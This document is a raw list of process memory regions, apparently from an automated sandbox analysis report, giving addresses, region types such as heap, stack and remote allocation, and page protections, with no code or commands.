trusted library allocation
page read and write
891D000
stack
page read and write
8B19000
heap
page read and write
244A6000
trusted library allocation
page read and write
1EA79220000
heap
page read and write
26B60000
trusted library allocation
page read and write
1EA79081000
heap
page read and write
26B80000
trusted library allocation
page read and write
26BA0000
trusted library allocation
page read and write
358E000
stack
page read and write
26B94000
trusted library allocation
page read and write
1EA791BF000
heap
page read and write
3540000
heap
page read and write
1EA79264000
heap
page read and write
1EA79065000
heap
page read and write
26B3E000
stack
page read and write
7FFD349D0000
trusted library allocation
page read and write
1EA792DC000
heap
page read and write
33A4000
heap
page read and write
243F8000
trusted library allocation
page read and write
2751E000
stack
page read and write
26BB0000
trusted library allocation
page read and write
1EA791A2000
heap
page read and write
26C30000
trusted library allocation
page read and write
1EA79458000
heap
page read and write
2458F000
trusted library allocation
page read and write
24521000
trusted library allocation
page read and write
7B5E000
heap
page read and write
4F9A000
stack
page read and write
26AFE000
stack
page read and write
1FEC6670000
heap
page read and write
244AE000
trusted library allocation
page read and write
3370000
heap
page read and write
7FFD349B0000
trusted library allocation
page read and write
759B000
stack
page read and write
3240000
heap
page read and write
4FCE000
stack
page read and write
23F1D000
stack
page read and write
244A0000
trusted library allocation
page read and write
1EA79030000
heap
page read and write
5C4B5FF000
unkown
page read and write
26680000
trusted library allocation
page read and write
1EA79285000
heap
page read and write
1EA7943B000
heap
page read and write
26BA0000
trusted library allocation
page read and write
1EA79086000
heap
page read and write
23FDE000
stack
page read and write
8B02000
heap
page read and write
1EA770DF000
heap
page read and write
26B70000
trusted library allocation
page read and write
1EA791DB000
heap
page read and write
1EA791E0000
heap
page read and write
1EA7921D000
heap
page read and write
1EA792CD000
heap
page read and write
4DC3000
trusted library allocation
page execute and read and write
6041000
remote allocation
page execute and read and write
1EA79046000
heap
page read and write
7FFD34AA0000
trusted library allocation
page read and write
4DF2000
trusted library allocation
page read and write
243E0000
heap
page read and write
2730000
heap
page read and write
26B70000
trusted library allocation
page read and write
7C80000
trusted library allocation
page read and write
243A9FD7000
trusted library allocation
page read and write
305B000
stack
page read and write
7FFD34A90000
trusted library allocation
page read and write
7B4C000
heap
page read and write
7E50000
trusted library allocation
page read and write
3430000
heap
page read and write
26B70000
trusted library allocation
page read and write
4DEA000
trusted library allocation
page execute and read and write
1EA7901C000
heap
page read and write
8AA8000
heap
page read and write
24510000
heap
page execute and read and write
1EA79094000
heap
page read and write
26B60000
trusted library allocation
page read and write
26B50000
trusted library allocation
page read and write
243A7FA0000
heap
page read and write
748E000
stack
page read and write
7EEB000
stack
page read and write
26BB0000
trusted library allocation
page read and write
8B23000
heap
page read and write
3477000
heap
page read and write
1EA791CD000
heap
page read and write
243C075E000
heap
page read and write
1EA79044000
heap
page read and write
26B70000
trusted library allocation
page read and write
7A9B27F000
stack
page read and write
1EA7942F000
heap
page read and write
75E0000
direct allocation
page read and write
9650000
direct allocation
page execute and read and write
243A6890000
heap
page read and write
3350000
heap
page read and write
1EA796B1000
heap
page read and write
2655B000
heap
page read and write
265DD000
heap
page read and write
22AD000
stack
page read and write
1EA7927D000
heap
page read and write
7C98000
trusted library allocation
page read and write
5825000
trusted library allocation
page read and write
1EA793B7000
heap
page read and write
1EA79099000
heap
page read and write
7FFD34826000
trusted library allocation
page read and write
244B2000
trusted library allocation
page read and write
243A8191000
trusted library allocation
page read and write
26BA0000
trusted library allocation
page read and write
53ED000
stack
page read and write
546E000
stack
page read and write
9BD84FE000
stack
page read and write
8BAE000
stack
page read and write
1EA79520000
heap
page read and write
26B60000
trusted library allocation
page read and write
1EA79036000
heap
page read and write
26BA0000
trusted library allocation
page read and write
243A6553000
heap
page read and write
1EA791DB000
heap
page read and write
1EA79244000
heap
page read and write
7B7E000
heap
page read and write
2407F000
stack
page read and write
243A8002000
heap
page read and write
26C20000
trusted library allocation
page read and write
3580000
heap
page read and write
243A8614000
trusted library allocation
page read and write
A3A000
trusted library allocation
page execute and read and write
1EA790B9000
heap
page read and write
8CE7000
heap
page read and write
8A10000
heap
page read and write
55B247E000
stack
page read and write
7DE0000
trusted library allocation
page read and write
381000
unkown
page execute read
26BA0000
trusted library allocation
page read and write
1EA79044000
heap
page read and write
7C50000
trusted library allocation
page read and write
8B26000
heap
page read and write
344F000
stack
page read and write
26B60000
trusted library allocation
page read and write
7FFD34A20000
trusted library allocation
page read and write
55B29BE000
stack
page read and write
1EA79165000
heap
page read and write
A00000
trusted library allocation
page read and write
23FF0000
trusted library allocation
page read and write
26B60000
trusted library allocation
page read and write
26B70000
trusted library allocation
page read and write
8CBE000
stack
page read and write
272E000
unkown
page read and write
243C0740000
heap
page read and write
7FFD34970000
trusted library allocation
page read and write
1EA770EF000
heap
page read and write
243A7FB2000
heap
page read and write
274DD000
stack
page read and write
7E80000
trusted library allocation
page read and write
77A0000
heap
page read and write
381000
unkown
page execute read
3237000
stack
page read and write
7FFD34990000
trusted library allocation
page read and write
334F000
stack
page read and write
8B66000
heap
page read and write
26BA0000
trusted library allocation
page read and write
265DE000
heap
page read and write
26B73000
trusted library allocation
page read and write
26BA0000
trusted library allocation
page read and write
A30000
trusted library allocation
page read and write
26B60000
trusted library allocation
page read and write
1EA7946E000
heap
page read and write
243A9F7D000
trusted library allocation
page read and write
8B2C000
stack
page read and write
243A9F95000
trusted library allocation
page read and write
39D000
unkown
page readonly
7EA0000
trusted library allocation
page read and write
26B50000
trusted library allocation
page read and write
26BA0000
trusted library allocation
page read and write
26B80000
trusted library allocation
page read and write
7FFD34774000
trusted library allocation
page read and write
1EA79046000
heap
page read and write
515E000
stack
page read and write
7C7A000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page execute and read and write
265A0000
heap
page read and write
7FFD34856000
trusted library allocation
page execute and read and write
7C60000
trusted library allocation
page read and write
243C05E0000
heap
page execute and read and write
55B2A3E000
stack
page read and write
7FFD34780000
trusted library allocation
page read and write
387000
unkown
page readonly
26BA0000
trusted library allocation
page read and write
26BB0000
trusted library allocation
page read and write
232D3610000
heap
page read and write
245A9000
trusted library allocation
page read and write
4DE0000
trusted library allocation
page read and write
1EA77280000
heap
page read and write
1EA79430000
heap
page read and write
26BA0000
trusted library allocation
page read and write
26B40000
trusted library allocation
page read and write
1EA77430000
heap
page read and write
243A8000000
heap
page read and write
26B60000
trusted library allocation
page read and write
A50000
trusted library allocation
page execute and read and write
232D3510000
heap
page read and write
1EA79410000
heap
page read and write
1EA7946E000
heap
page read and write
25521000
trusted library allocation
page read and write
1EA7905F000
heap
page read and write
1EA79295000
heap
page read and write
26C10000
trusted library allocation
page execute and read and write
7B4F000
heap
page read and write
7FFD34A40000
trusted library allocation
page read and write
1EA7917B000
heap
page read and write
26BB0000
trusted library allocation
page read and write
23F9D000
stack
page read and write
243A8073000
heap
page read and write
26B70000
trusted library allocation
page read and write
1EA790B9000
heap
page read and write
243A6500000
heap
page read and write
8841000
remote allocation
page execute and read and write
1EA77191000
heap
page read and write
50DA000
stack
page read and write
501E000
stack
page read and write
243A8065000
heap
page read and write
357E000
stack
page read and write
1EA7743E000
heap
page read and write
26B70000
trusted library allocation
page read and write
1EA79052000
heap
page read and write
243A95EA000
trusted library allocation
page read and write
26BB0000
trusted library allocation
page read and write
1EA790B9000
heap
page read and write
26B80000
trusted library allocation
page read and write
1EA791CD000
heap
page read and write
26690000
heap
page execute and read and write
55B24FC000
stack
page read and write
39D000
unkown
page readonly
7FFD34A80000
trusted library allocation
page read and write
1EA79183000
heap
page read and write
26C40000
trusted library allocation
page read and write
1EA793B6000
heap
page read and write
1EA79096000
heap
page read and write
1EA7917D000
heap
page read and write
1EA79411000
heap
page read and write
1EA79439000
heap
page read and write
A2D000
trusted library allocation
page execute and read and write
26BB0000
trusted library allocation
page read and write
51D0000
heap
page read and write
232D38D5000
heap
page read and write
1EA792DC000
heap
page read and write
755D000
stack
page read and write
243A6430000
heap
page read and write
55B273F000
stack
page read and write
1EA7905E000
heap
page read and write
564F000
stack
page read and write
8880000
heap
page read and write
4DD9000
trusted library allocation
page read and write
3610000
heap
page read and write
243A8180000
heap
page read and write
8C90000
heap
page read and write
1EA790BB000
heap
page read and write
243A6593000
heap
page read and write
7C90000
trusted library allocation
page read and write
244CD000
trusted library allocation
page read and write
26B90000
trusted library allocation
page read and write
8B26000
heap
page read and write
7FFD34772000
trusted library allocation
page read and write
244AB000
trusted library allocation
page read and write
27520000
trusted library allocation
page read and write
243A8A23000
trusted library allocation
page read and write
574E000
stack
page read and write
1EA77165000
heap
page read and write
244BE000
trusted library allocation
page read and write
A45000
trusted library allocation
page execute and read and write
26B5D000
trusted library allocation
page read and write
7610000
direct allocation
page read and write
1EA77157000
heap
page read and write
26B60000
trusted library allocation
page read and write
243A7F47000
heap
page execute and read and write
1EA7901C000
heap
page read and write
26B50000
trusted library allocation
page read and write
1EA791E0000
heap
page read and write
509B000
stack
page read and write
243A801B000
heap
page read and write
1EA791BD000
heap
page read and write
39D000
unkown
page readonly
1EA791CD000
heap
page read and write
8B60000
heap
page read and write
26B60000
trusted library allocation
page read and write
1EA79011000
heap
page read and write
1EA7906A000
heap
page read and write
7E40000
trusted library allocation
page read and write
243A6549000
heap
page read and write
55B358E000
stack
page read and write
8EC0000
direct allocation
page read and write
2430E000
stack
page read and write
26B80000
trusted library allocation
page read and write
3294000
heap
page read and write
1EA790B4000
heap
page read and write
1EA791BA000
heap
page read and write
26B80000
trusted library allocation
page read and write
74CF000
stack
page read and write
1EA79121000
heap
page read and write
1EA791BA000
heap
page read and write
385000
unkown
page readonly
1EA7945A000
heap
page read and write
1EA770B0000
heap
page read and write
9BD80FE000
stack
page read and write
243A8684000
trusted library allocation
page read and write
1EA794C8000
heap
page read and write
8CE0000
heap
page read and write
320E000
stack
page read and write
89A0000
heap
page read and write
32C0000
heap
page read and write
7FFD34921000
trusted library allocation
page read and write
7FFD349A0000
trusted library allocation
page read and write
26C40000
trusted library allocation
page read and write
26BA0000
trusted library allocation
page read and write
24220000
direct allocation
page read and write
5167000
trusted library allocation
page read and write
243A64A0000
heap
page read and write
8BA0000
direct allocation
page read and write
A14000
trusted library allocation
page read and write
1EA792B8000
heap
page read and write
26BA0000
trusted library allocation
page read and write
26B80000
trusted library allocation
page read and write
26B90000
trusted library allocation
page read and write
A32000
trusted library allocation
page read and write
8970000
trusted library allocation
page execute and read and write
738E000
stack
page read and write
26B90000
trusted library allocation
page read and write
26B80000
trusted library allocation
page read and write
A36000
trusted library allocation
page execute and read and write
1EA7928D000
heap
page read and write
243A6895000
heap
page read and write
26B80000
trusted library allocation
page read and write
55B368B000
stack
page read and write
1EA791A2000
heap
page read and write
241CE000
stack
page read and write
26BA0000
trusted library allocation
page read and write
36C0000
heap
page read and write
1EA79144000
heap
page read and write
26C40000
trusted library allocation
page read and write
3690000
heap
page read and write
3600000
trusted library allocation
page read and write
25586000
trusted library allocation
page read and write
26BA0000
trusted library allocation
page read and write
1EA791D1000
heap
page read and write
1EA7958C000
heap
page read and write
3100000
heap
page read and write
26B70000
trusted library allocation
page read and write
586E000
trusted library allocation
page read and write
1EA791A2000
heap
page read and write
8CB0000
heap
page read and write
26B70000
trusted library allocation
page read and write
8A80000
direct allocation
page read and write
24190000
remote allocation
page read and write
4EC8000
trusted library allocation
page read and write
7EE20000
trusted library allocation
page execute and read and write
506A000
trusted library allocation
page read and write
1EA790B9000
heap
page read and write
7B5A000
heap
page read and write
4E5E000
stack
page read and write
26BD0000
trusted library allocation
page read and write
26C00000
trusted library allocation
page read and write
26B80000
trusted library allocation
page read and write
26A7D000
stack
page read and write
8C30000
trusted library allocation
page read and write
2653F000
heap
page read and write
3248000
heap
page read and write
1FEC64AA000
heap
page read and write
243A6551000
heap
page read and write
1EA7946E000
heap
page read and write
1EA7909E000
heap
page read and write
26BB0000
trusted library allocation
page read and write
8C97000
heap
page read and write
24190000
remote allocation
page read and write
1EA79014000
heap
page read and write
7FFD34980000
trusted library allocation
page read and write
7FFD34A00000
trusted library allocation
page read and write
7A9AF5C000
stack
page read and write
1EA79589000
heap
page read and write
1EA79163000
heap
page read and write
77B8000
heap
page read and write
24090000
heap
page read and write
243A862D000
trusted library allocation
page read and write
1EA7920E000
heap
page read and write
26BC0000
trusted library allocation
page read and write
232D35F0000
heap
page read and write
1EA7904A000
heap
page read and write
8877000
stack
page read and write
8B0E000
heap
page read and write
1EA7914F000
heap
page read and write
26BA0000
trusted library allocation
page read and write
7C10000
trusted library allocation
page read and write
1FEC6470000
heap
page read and write
1EA792C1000
heap
page read and write
265F7000
heap
page read and write
1EA770E0000
heap
page read and write
243B847A000
trusted library allocation
page read and write
89B0000
trusted library allocation
page execute and read and write
8C20000
direct allocation
page read and write
26B50000
trusted library allocation
page read and write
26B72000
trusted library allocation
page read and write
243A867F000
trusted library allocation
page read and write
7B19000
heap
page read and write
26B80000
trusted library allocation
page read and write
26BB0000
trusted library allocation
page read and write
1EA79044000
heap
page read and write
26B70000
trusted library allocation
page read and write
1EA79261000
heap
page read and write
330E000
stack
page read and write
26BB0000
trusted library allocation
page read and write
31A0000
heap
page read and write
895E000
stack
page read and write
56CC000
stack
page read and write
26B70000
trusted library allocation
page read and write
26B60000
trusted library allocation
page read and write
1EA79055000
heap
page read and write
7FFD34890000
trusted library allocation
page execute and read and write
55B257E000
stack
page read and write
1EA7946E000
heap
page read and write
4F5C000
stack
page read and write
1EA79062000
heap
page read and write
1EA792B5000
heap
page read and write
1EA79011000
heap
page read and write
7E10000
trusted library allocation
page read and write
1EA7920D000
heap
page read and write
243A650D000
heap
page read and write
8BD0000
direct allocation
page read and write
26BA0000
trusted library allocation
page read and write
26B50000
trusted library allocation
page read and write
35CF000
stack
page read and write
26B90000
trusted library allocation
page read and write
1EA79183000
heap
page read and write
26B71000
trusted library allocation
page read and write
380000
unkown
page readonly
26B60000
trusted library allocation
page read and write
8CDA000
heap
page read and write
26BA0000
trusted library allocation
page read and write
7B29000
heap
page read and write
243A7FA5000
heap
page read and write
1EA7941C000
heap
page read and write
8BC0000
direct allocation
page read and write
26B70000
trusted library allocation
page read and write
7FFD34820000
trusted library allocation
page read and write
243A7FB6000
heap
page read and write
26BB0000
trusted library allocation
page read and write
3620000
heap
page read and write
243A86DE000
trusted library allocation
page read and write
7FFD34A30000
trusted library allocation
page read and write
578F000
stack
page read and write
1EA79017000
heap
page read and write
1EA79027000
heap
page read and write
89D0000
trusted library allocation
page read and write
1EA7905A000
heap
page read and write
7600000
direct allocation
page read and write
76DE000
stack
page read and write
6021000
trusted library allocation
page read and write
1EA791CD000
heap
page read and write
3287000
heap
page read and write
24584000
trusted library allocation
page read and write
1EA7926C000
heap
page read and write
7B10000
heap
page read and write
26BA0000
trusted library allocation
page read and write
26B70000
trusted library allocation
page read and write
1EA79251000
heap
page read and write
7FFD34960000
trusted library allocation
page execute and read and write
243A8600000
trusted library allocation
page read and write
4E10000
trusted library allocation
page read and write
26B70000
trusted library allocation
page read and write
1EA7941F000
heap
page read and write
1EA791C0000
heap
page read and write
A13000
trusted library allocation
page execute and read and write
AC0000
heap
page read and write
7FFD34A60000
trusted library allocation
page read and write
8B68000
heap
page read and write
243A9F56000
trusted library allocation
page read and write
272A1000
heap
page read and write
26B50000
trusted library allocation
page read and write
8AE1000
heap
page read and write
2434F000
stack
page read and write
7A22000
heap
page read and write
1EA79036000
heap
page read and write
1EA79230000
heap
page read and write
7DF476D70000
trusted library allocation
page execute and read and write
1EA79179000
heap
page read and write
26BB0000
trusted library allocation
page read and write
1EA791D1000
heap
page read and write
26B80000
trusted library allocation
page read and write
26BE0000
trusted library allocation
page read and write
243A8A2F000
trusted library allocation
page read and write
1EA79183000
heap
page read and write
55DE000
stack
page read and write
26BA0000
trusted library allocation
page read and write
4F1C000
stack
page read and write
35F0000
trusted library section
page read and write
DE31000
direct allocation
page execute and read and write
4F5E000
stack
page read and write
242C9000
stack
page read and write
2428A000
stack
page read and write
265DE000
heap
page read and write
243A89D5000
trusted library allocation
page read and write
26B71000
trusted library allocation
page read and write
387000
unkown
page readonly
26C40000
trusted library allocation
page read and write
7730000
direct allocation
page read and write
35E0000
trusted library section
page read and write
8B74000
heap
page read and write
8B19000
heap
page read and write
26B60000
trusted library allocation
page read and write
1EA790A4000
heap
page read and write
26BB0000
trusted library allocation
page read and write
1EA770B8000
heap
page read and write
26660000
trusted library allocation
page read and write
7FFD34A50000
trusted library allocation
page read and write
9BD7DFE000
stack
page read and write
1EA7905D000
heap
page read and write
1EA791EF000
heap
page read and write
7E00000
trusted library allocation
page read and write
26C20000
trusted library allocation
page read and write
1EA79183000
heap
page read and write
26B60000
trusted library allocation
page read and write
9831000
direct allocation
page execute and read and write
1EA791E8000
heap
page read and write
8C80000
trusted library allocation
page read and write
1EA791BA000
heap
page read and write
26BB0000
trusted library allocation
page read and write
7440000
heap
page execute and read and write
1EA7743B000
heap
page read and write
26B80000
trusted library allocation
page read and write
24190000
remote allocation
page read and write
243A8642000
trusted library allocation
page read and write
243A6880000
trusted library allocation
page read and write
1EA791CD000
heap
page read and write
26BA0000
trusted library allocation
page read and write
3530000
heap
page read and write
1EA79479000
heap
page read and write
1EA791CD000
heap
page read and write
5011000
trusted library allocation
page read and write
1EA796B0000
heap
page read and write
26B70000
trusted library allocation
page read and write
7FFD34AB0000
trusted library allocation
page read and write
8C9C000
heap
page read and write
1EA7920B000
heap
page read and write
243A80B0000
heap
page execute and read and write
1EA792B0000
heap
page read and write
1EA791D1000
heap
page read and write
243A7EE0000
trusted library allocation
page read and write
243C0710000
heap
page read and write
1EA79249000
heap
page read and write
26BA0000
trusted library allocation
page read and write
8890000
trusted library allocation
page execute and read and write
243C0630000
heap
page read and write
26BB0000
trusted library allocation
page read and write
243B8489000
trusted library allocation
page read and write
23AD000
stack
page read and write
1EA7743E000
heap
page read and write
1EA79426000
heap
page read and write
26BC0000
trusted library allocation
page read and write
1EA792BD000
heap
page read and write
232D36B8000
heap
page read and write
1EA7919A000
heap
page read and write
26520000
heap
page read and write
26BA0000
trusted library allocation
page read and write
1EA79046000
heap
page read and write
265F1000
heap
page read and write
243A861C000
trusted library allocation
page read and write
1EA77380000
remote allocation
page read and write
26B60000
trusted library allocation
page read and write
54AF000
stack
page read and write
7CB0000
trusted library allocation
page read and write
1EA794C7000
heap
page read and write
243C076D000
heap
page read and write
7E60000
trusted library allocation
page read and write
55B267E000
stack
page read and write
1EA79177000
heap
page read and write
26B50000
trusted library allocation
page read and write
89C0000
trusted library allocation
page read and write
1EA790BB000
heap
page read and write
1EA7925C000
heap
page read and write
1EA791C8000
heap
page read and write
7E20000
trusted library allocation
page read and write
7FFD34930000
trusted library allocation
page execute and read and write
511E000
stack
page read and write
1EA790AD000
heap
page read and write
1EA7919A000
heap
page read and write
361B000
heap
page read and write
3195000
heap
page read and write
55B20D3000
stack
page read and write
7740000
direct allocation
page read and write
4E9E000
stack
page read and write
1EA7949D000
heap
page read and write
6078000
trusted library allocation
page read and write
267DC000
stack
page read and write
AC31000
direct allocation
page execute and read and write
387000
unkown
page readonly
2438C000
stack
page read and write
243A8215000
trusted library allocation
page read and write
26B47000
trusted library allocation
page read and write
7FFD34AD0000
trusted library allocation
page read and write
26BA0000
trusted library allocation
page read and write
1EA79241000
heap
page read and write
7B71000
heap
page read and write
1EA77380000
remote allocation
page read and write
1EA79052000
heap
page read and write
1EA790BB000
heap
page read and write
26620000
trusted library allocation
page read and write
1EA77191000
heap
page read and write
1EA79076000
heap
page read and write
4DF5000
trusted library allocation
page execute and read and write
1EA79040000
heap
page read and write
1EA791BA000
heap
page read and write
26BA0000
trusted library allocation
page read and write
1EA79218000
heap
page read and write
2420F000
stack
page read and write
243A7FE9000
heap
page read and write
7E30000
trusted library allocation
page read and write
8B20000
heap
page read and write
1EA794C7000
heap
page read and write
1EA7906D000
heap
page read and write
243A942F000
trusted library allocation
page read and write
1EA79210000
heap
page read and write
26BD0000
trusted library allocation
page read and write
1EA790B6000
heap
page read and write
1EA791DB000
heap
page read and write
1EA79441000
heap
page read and write
387000
unkown
page readonly
26C20000
trusted library allocation
page read and write
26BB0000
trusted library allocation
page read and write
32EE000
stack
page read and write
243A9FD3000
trusted library allocation
page read and write
26BA0000
trusted library allocation
page read and write
26B80000
trusted library allocation
page read and write
55B360D000
stack
page read and write
1EA7717A000
heap
page read and write
1EA79021000
heap
page read and write
1EA79288000
heap
page read and write
55B25FF000
stack
page read and write
6039000
trusted library allocation
page read and write
1EA790BC000
heap
page read and write
243A8704000
trusted library allocation
page read and write
1EA77172000
heap
page read and write
32A0000
heap
page read and write
243A654B000
heap
page read and write
1EA791E0000
heap
page read and write
2412F000
stack
page read and write
243A8845000
trusted library allocation
page read and write
27A0000
heap
page read and write
26B80000
trusted library allocation
page read and write
1EA79239000
heap
page read and write
79CE000
stack
page read and write
1FEC6475000
heap
page read and write
318F000
stack
page read and write
26B80000
trusted library allocation
page read and write
26660000
heap
page read and write
1EA791D1000
heap
page read and write
24240000
heap
page read and write
26B60000
trusted library allocation
page read and write
26B80000
trusted library allocation
page read and write
243A9A4C000
trusted library allocation
page read and write
32B3000
heap
page read and write
568B000
stack
page read and write
7E90000
trusted library allocation
page read and write
26B50000
trusted library allocation
page read and write
27C0000
heap
page read and write
243C079E000
heap
page read and write
1EA79011000
heap
page read and write
381000
unkown
page execute read
243B8191000
trusted library allocation
page read and write
1EA792DC000
heap
page read and write
380000
unkown
page readonly
4F60000
trusted library allocation
page execute and read and write
8B72000
heap
page read and write
1EA79610000
heap
page read and write
1EA79022000
heap
page read and write
244E0000
trusted library allocation
page read and write
5846000
trusted library allocation
page read and write
1EA791DB000
heap
page read and write
244BA000
trusted library allocation
page read and write
1EA791E0000
heap
page read and write
1EA790B9000
heap
page read and write
1EA79254000
heap
page read and write
243A6460000
heap
page read and write
26B70000
trusted library allocation
page read and write
240EE000
stack
page read and write
244C1000
trusted library allocation
page read and write
75A0000
direct allocation
page read and write
243A6544000
heap
page read and write
7D4E000
stack
page read and write
1EA79438000
heap
page read and write
26BA0000
trusted library allocation
page read and write
1EA79183000
heap
page read and write
1EA7943F000
heap
page read and write
1FEC6430000
heap
page read and write
75D0000
direct allocation
page read and write
243A9FEB000
trusted library allocation
page read and write
1EA791CD000
heap
page read and write
1EA790B9000
heap
page read and write
243A87C3000
trusted library allocation
page read and write
26B70000
trusted library allocation
page read and write
243C075A000
heap
page read and write
24490000
trusted library allocation
page read and write
1EA791DB000
heap
page read and write
7C57000
trusted library allocation
page read and write
277E000
stack
page read and write
243C0792000
heap
page read and write
9BD82FD000
stack
page read and write
244C6000
trusted library allocation
page read and write
1EA791BA000
heap
page read and write
8E90000
trusted library allocation
page execute and read and write
1EA791BE000
heap
page read and write
26BA0000
trusted library allocation
page read and write
1EA7717F000
heap
page read and write
8EB0000
trusted library allocation
page read and write
26B70000
trusted library allocation
page read and write
26BA0000
trusted library allocation
page read and write
1EA7901C000
heap
page read and write
9BD792A000
stack
page read and write
8A90000
direct allocation
page read and write
243A7EB0000
trusted library allocation
page read and write
39D000
unkown
page readonly
1EA790C1000
heap
page read and write
8AA0000
heap
page read and write
1EA791C0000
heap
page read and write
26BB0000
trusted library allocation
page read and write
2BE0000
heap
page read and write
1EA7902C000
heap
page read and write
28D0000
heap
page read and write
4DCD000
trusted library allocation
page execute and read and write
2403E000
stack
page read and write
3269000
heap
page read and write
243A7FB0000
heap
page read and write
1EA792A5000
heap
page read and write
26B60000
trusted library allocation
page read and write
26BB0000
trusted library allocation
page read and write
337C000
heap
page read and write
560E000
stack
page read and write
1EA792DC000
heap
page read and write
243A806A000
heap
page read and write
7FFD3492A000
trusted library allocation
page read and write
1EA7919A000
heap
page read and write
243A89D7000
trusted library allocation
page read and write
7E41000
remote allocation
page execute and read and write
26B70000
trusted library allocation
page read and write
26680000
trusted library allocation
page read and write
3099000
stack
page read and write
243A6440000
heap
page read and write
1EA79225000
heap
page read and write
26BB0000
trusted library allocation
page read and write
1EA772A0000
heap
page read and write
5000000
heap
page execute and read and write
1EA791E0000
heap
page read and write
243A6565000
heap
page read and write
243A658C000
heap
page read and write
8C10000
direct allocation
page read and write
A47000
trusted library allocation
page execute and read and write
542E000
stack
page read and write
4FDC000
stack
page read and write
1EA790AF000
heap
page read and write
5C4B4FD000
stack
page read and write
2459D000
trusted library allocation
page read and write
55B2ABE000
stack
page read and write
314E000
stack
page read and write
1EA79011000
heap
page read and write
7FFD34773000
trusted library allocation
page execute and read and write
7CC0000
heap
page execute and read and write
55B28BC000
stack
page read and write
7FFD349E0000
trusted library allocation
page read and write
7DCD000
stack
page read and write
4F70000
trusted library allocation
page read and write
26B70000
trusted library allocation
page read and write
232D5220000
heap
page read and write
243A8618000
trusted library allocation
page read and write
7FFD3478B000
trusted library allocation
page read and write
8BF0000
direct allocation
page read and write
55B2837000
stack
page read and write
75B0000
direct allocation
page read and write
8C7E000
stack
page read and write
A4B000
trusted library allocation
page execute and read and write
26B60000
trusted library allocation
page read and write
1EA791BD000
heap
page read and write
26B60000
trusted library allocation
page read and write
1EA7923C000
heap
page read and write
26B70000
trusted library allocation
page read and write
272A0000
heap
page read and write
1EA792C8000
heap
page read and write
1EA7929D000
heap
page read and write
1EA794F4000
heap
page read and write
243C0610000
heap
page read and write
1EA791D1000
heap
page read and write
1EA79024000
heap
page read and write
771D000
stack
page read and write
7FFD34A70000
trusted library allocation
page read and write
3438000
heap
page read and write
266A0000
heap
page read and write
75F0000
direct allocation
page read and write
26BA0000
trusted library allocation
page read and write
26B80000
trusted library allocation
page read and write
1EA790B9000
heap
page read and write
26B80000
trusted library allocation
page read and write
385000
unkown
page readonly
1EA793B8000
heap
page read and write
8B23000
heap
page read and write
1FEC6440000
heap
page read and write
243A89BA000
trusted library allocation
page read and write
1EA7915E000
heap
page read and write
561F000
stack
page read and write
3482000
heap
page read and write
1EA7946E000
heap
page read and write
1FEC6474000
heap
page read and write
7C70000
trusted library allocation
page read and write
26B80000
trusted library allocation
page read and write
243A8609000
trusted library allocation
page read and write
1EA7908B000
heap
page read and write
243A83B7000
trusted library allocation
page read and write
1EA79044000
heap
page read and write
7A9AFDF000
stack
page read and write
1EA77360000
heap
page read and write
1EA792A0000
heap
page read and write
243B81B1000
trusted library allocation
page read and write
265F1000
heap
page read and write
8C00000
direct allocation
page read and write
26B60000
trusted library allocation
page read and write
7FFD34830000
trusted library allocation
page execute and read and write
A20000
trusted library allocation
page read and write
1EA79411000
heap
page read and write
380000
unkown
page readonly
26B70000
trusted library allocation
page read and write
1EA79259000
heap
page read and write
26BB0000
trusted library allocation
page read and write
26BB0000
trusted library allocation
page read and write
1EA791DB000
heap
page read and write
3279000
stack
page read and write
332E000
stack
page read and write
1EA7905F000
heap
page read and write
243C074A000
heap
page read and write
7750000
direct allocation
page read and write
7FFD34AE0000
trusted library allocation
page read and write
232D36B0000
heap
page read and write
3480000
heap
page read and write
55B26F9000
stack
page read and write
8A15000
heap
page read and write
7C20000
trusted library allocation
page read and write
1EA7903C000
heap
page read and write
8ED0000
direct allocation
page read and write
26B63000
trusted library allocation
page read and write
1EA79036000
heap
page read and write
26B90000
trusted library allocation
page execute and read and write
1EA79038000
heap
page read and write
7D8E000
stack
page read and write
7FFD34910000
trusted library allocation
page read and write
A1D000
trusted library allocation
page execute and read and write
1EA7907E000
heap
page read and write
1EA79037000
heap
page read and write
55B350E000
stack
page read and write
232D38D0000
heap
page read and write
24500000
trusted library allocation
page read and write
4DD0000
trusted library allocation
page read and write
26B70000
trusted library allocation
page read and write
4241000
remote allocation
page execute and read and write
3455000
heap
page read and write
26B90000
trusted library allocation
page read and write
243A8A0D000
trusted library allocation
page read and write
1EA7924C000
heap
page read and write
243CD000
stack
page read and write
B631000
direct allocation
page execute and read and write
9BD81FB000
stack
page read and write
2665C000
stack
page read and write
1EA7906C000
heap
page read and write
243AA10A000
trusted library allocation
page read and write
1EA7907C000
heap
page read and write
26B80000
trusted library allocation
page read and write
1EA791A2000
heap
page read and write
26BB0000
trusted library allocation
page read and write
1EA790BB000
heap
page read and write
26BA0000
trusted library allocation
page read and write
380000
unkown
page readonly
1EA79179000
heap
page read and write
1EA79110000
heap
page read and write
35B0000
heap
page read and write
1EA7904D000
heap
page read and write
1EA791DB000
heap
page read and write
35D0000
heap
page read and write
4060000
remote allocation
page execute and read and write
1EA79271000
heap
page read and write
26B50000
trusted library allocation
page read and write
1EA79111000
heap
page read and write
62BB000
trusted library allocation
page read and write
1FEC64A0000
heap
page read and write
266A1000
heap
page read and write
265F5000
heap
page read and write
243A9F68000
trusted library allocation
page read and write
1EA7920E000
heap
page read and write
243C07A9000
heap
page read and write
26B73000
trusted library allocation
page read and write
2610000
heap
page read and write
1EA791E0000
heap
page read and write
26660000
trusted library allocation
page read and write
7FFD349C0000
trusted library allocation
page read and write
28DC000
heap
page read and write
26BB0000
trusted library allocation
page read and write
7EF10000
trusted library allocation
page execute and read and write
26B60000
trusted library allocation
page read and write
7A0F000
stack
page read and write
7FFD34770000
trusted library allocation
page read and write
1EA790BB000
heap
page read and write
A10000
trusted library allocation
page read and write
4EB0000
heap
page read and write
1EA79280000
heap
page read and write
1EA770A0000
heap
page read and write
7720000
direct allocation
page read and write
381000
unkown
page execute read
7FFD34940000
trusted library allocation
page execute and read and write
243A9F3D000
trusted library allocation
page read and write
26B80000
trusted library allocation
page read and write
559E000
stack
page read and write
1EA7743C000
heap
page read and write
23F5C000
stack
page read and write
1EA7743A000
heap
page read and write
7D0E000
stack
page read and write
2468E000
trusted library allocation
page read and write
26B60000
trusted library allocation
page read and write
26B70000
trusted library allocation
page read and write
7FFD349F0000
trusted library allocation
page read and write
3260000
heap
page read and write
385000
unkown
page readonly
1EA79290000
heap
page read and write
6011000
trusted library allocation
page read and write
1EA79056000
heap
page read and write
1EA79269000
heap
page read and write
8CA4000
heap
